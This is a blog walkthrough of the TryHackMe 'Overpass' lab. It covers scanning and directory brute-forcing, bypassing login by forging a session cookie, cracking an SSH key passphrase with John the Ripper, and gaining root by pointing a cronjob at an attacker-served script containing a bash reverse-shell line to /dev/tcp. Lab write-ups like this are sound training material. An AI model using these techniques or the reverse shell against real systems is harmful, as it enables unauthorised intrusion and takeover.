Overpass | THM

::::What happens when some broke Comp Sci students make a password manager?::::LET'S HACK...

++Scanning++

Let’s start with the simple NMAP scan

nmap -sV -T4 -sC machine_IP -oN /output_scan_to_your_directory

ports we found : 22,80 which are common ports

As port 80 is open let’s check it then :

++HTTP++

We are greeted with “welcome to overpass” page

++SOURCE CODE++

highlighted in green text colour

anyway always it’s good practice to check the source code of site so let’s check and we can see some comment about their security hmm…
Now , I decided to run directory brute forcing against this site and got some hits in which particular sub directory was interesting:

++GOBUSTER++

Exploring the directory :

I could try sql injection but no luck with that ..

So, moving forward with source code Here what I find interesting
there are bunch of java script and /login.js
let’s explore and find out :

++JAVA_SCRIPT++

analyzing the code how it works

So, script is checking Cookie tokens and granting access , as no cookies are generated we can give our cookie matching the conditions.

++PLAYING WITH COOKIES++

editing cookie with name as Session token and value literally anything WITH path as /
page refresh voila you got your ssh private key.
I’m pretty sure that ssh-key will prompt for password(which we don’t know)
but yeah cracking id_rsa would work so, I’m gonna crack id_rsa with
JOHN THE RIPPER

++CRACKING SSH PASSWORD++

commands:

  • converting id_rsa key into hashes
    ssh2john [your_id_rsa.key] > /hash.txt
  • cracking hash.txt with john the ripper

exploring We use privsec tool and recon this site from some useful directories or some useful directories.

++USER FLAG++

By going through every detail we can find a cronjob which is running some buildscript.sh

Now we change the buildscript with our reverse shell ie editing buildscript.sh
with bash reverse_shell from github

bash -i >& /dev/tcp/Machine_IP/8080 0>&1

As we see the web is curl overpass.thm/downloads/src/buildscript.sh ..
we are going to make exactly same directories on our local machine and before doing this make sure you have edited hosts file with our local_machine_IP

edit with your local_machineIP

++STARTING OUR PYTHON3 SERVER++

Start your python server at port 80 in your local machine

  • +NET CAT LISTENER
cd into root and we find root flag

++TAKEAWAY FROM THIS MACHINE++

This was easy box from NinjaJc01
this covers all the basic from enumeration to rooting this box , even this involved OWASP top 10..This box made sure to checkout source of each directory. phew… finally thanks for reading
feel free to suggest me … cheers !

--

--

--

security researcher

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
sw0rdf1sh

security researcher